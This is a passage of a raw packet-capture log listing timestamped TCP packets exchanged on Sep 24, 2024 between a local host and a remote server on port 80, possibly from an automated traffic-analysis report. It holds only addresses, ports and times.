                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757189035 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757227898 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757232904 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757235050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757247925 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757282019 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757297993 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757322073 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757328987 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757339954 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757347107 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757394075 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757435083 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757450104 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757457018 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757505894 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757514000 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757519007 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757529974 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757536888 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757563114 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757616043 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757627010 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757632971 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757644892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757651091 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757689953 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757713079 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757715940 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757719994 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.757772923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.784869909 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.784904957 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.785008907 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.785075903 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.785083055 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.785094976 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.785100937 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.785155058 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.785182953 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.785188913 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.785233021 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830235958 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830260038 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830274105 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830341101 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830394983 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830395937 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830409050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830430031 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830441952 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830455065 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830492973 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.830952883 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831001997 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831011057 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831036091 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831054926 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831096888 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831106901 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831123114 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831139088 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831139088 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831176043 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831216097 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.831990004 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832000017 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832024097 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832056046 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832084894 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832113981 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832122087 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832146883 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832169056 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832184076 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832201004 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832207918 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832248926 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832520962 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832544088 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832562923 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832585096 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832597017 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832609892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832616091 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832622051 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832653046 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832653999 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832663059 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832685947 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832693100 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832732916 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832741022 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832760096 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832794905 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832829952 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832859993 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832878113 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832897902 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832920074 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832922935 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832966089 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832972050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.832979918 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833003998 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833025932 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833051920 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833102942 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833111048 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833136082 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833144903 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833157063 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833165884 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833182096 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833195925 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833199978 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833220005 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833242893 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833250046 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833251953 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833282948 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833292961 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833296061 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833317995 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833334923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833381891 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833383083 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833395004 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833410025 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833415985 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833427906 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833446026 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.833471060 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834003925 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834059000 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834062099 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834075928 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834108114 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834148884 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834150076 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834157944 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834178925 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834193945 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834203959 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834207058 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.834247112 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839492083 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839539051 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839565992 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839620113 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839648008 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839657068 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839664936 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839689970 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839699030 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839709997 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.839776039 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842139959 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842148066 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842173100 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842216015 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842242002 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842242002 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842251062 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842272997 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842297077 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842329979 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842611074 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.842684031 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843100071 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843107939 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843127966 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843138933 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843158960 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843161106 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843170881 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843194008 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843219042 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843219042 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843234062 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843249083 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843264103 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843274117 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843286037 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843291044 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843303919 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843313932 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843332052 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843332052 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843337059 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843348980 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843360901 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843400002 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843400002 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843432903 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843544006 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843556881 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843573093 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843594074 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843610048 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843610048 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843625069 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843632936 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843647957 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843652964 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843666077 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843681097 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843699932 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843713045 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843718052 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843723059 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843743086 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843772888 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843873024 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843883991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843894005 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843909979 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843929052 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843946934 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843952894 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843952894 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.843960047 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844032049 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844032049 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844099045 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844110966 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844131947 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844151974 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844157934 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844182014 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844233036 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844248056 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844269037 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844280958 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844288111 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844293118 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844315052 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844326019 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844329119 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844337940 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844351053 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844357967 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844373941 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844383001 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844402075 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844413042 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844423056 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844435930 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844451904 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844456911 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844456911 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844465971 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844475031 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844484091 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844517946 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844655991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844671965 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844693899 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844703913 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844708920 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844722033 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844741106 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844743013 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844760895 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844779968 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844799995 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844820023 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844834089 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844850063 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844854116 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844871044 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:32.844880104 CEST8049735103.130.147.211192.168.2.8
